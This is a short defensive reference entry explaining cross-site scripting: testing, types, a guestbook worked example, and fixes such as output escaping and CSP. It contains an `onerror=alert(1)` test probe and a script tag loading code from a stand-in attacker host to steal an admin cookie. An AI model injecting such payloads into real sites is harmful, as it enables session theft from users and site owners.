Malware
Cross-site scripting
Also called XSS.
Cross-site scripting is getting a victim's browser to run an attacker's JavaScript as part of your page. From there the script can read cookies, steal tokens, change what the page shows, or send keystrokes elsewhere.
How it is measured
Test every place user input is echoed: search boxes, comments, profile names, URL parameters, error messages. Submit `<img src=x onerror=alert(1)>` and see whether it executes. Automated scanners fuzz with payloads; manual review follows the data from input to output.
Classify the finding. Reflected XSS lives in a single request. Stored XSS sits in the database and hits everyone who views it. DOM XSS happens entirely in client-side code, so the server never sees it.
Worked example
A guestbook plugin on a small travel blog prints the visitor's name straight into the page. An attacker signs as `<script src=//evil.example/s.js></script>`. Every reader who opens the guestbook runs that file, which reads the admin cookie when the owner visits and posts it to the attacker.
The author switches to `esc_html()` on output and the signature renders as harmless text. A CSP with no inline allowances would have also blocked the load.
How it differs
XSS runs attacker code in your page. CSRF sends a forged request from your user's browser without running any code of the attacker's inside your origin. CSP is a defense layer against XSS, not a fix: it limits what injected script can do. CWE lists XSS as a weakness class, with many CVEs of its own.
Common errors
Filtering input and forgetting to escape output. Escaping for HTML but not for attributes, URLs, or JavaScript. Trusting a rich-text editor. Removing `<script>` tags with a regex. Skipping `innerHTML` review in front-end code. Believing HttpOnly cookies make XSS harmless.
In practice
Escape on output in the context where the data lands. Use framework defaults, and treat `dangerouslySetInnerHTML` and `innerHTML` as review triggers. Add a CSP that forbids inline script, then read the first week of violation reports for places you missed.